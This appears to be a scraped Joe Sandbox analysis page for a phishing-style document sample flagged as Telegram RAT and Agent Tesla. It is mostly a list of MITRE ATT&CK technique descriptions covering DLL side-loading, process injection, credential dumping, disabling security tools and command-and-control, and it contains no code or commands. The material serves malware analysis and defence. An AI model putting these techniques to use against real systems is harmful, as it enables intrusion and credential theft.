Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report REQUEST FOR QUOTATION.docx.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF6a5c44.TMP (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin

Windows Analysis Report
REQUEST FOR QUOTATION.docx.doc

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre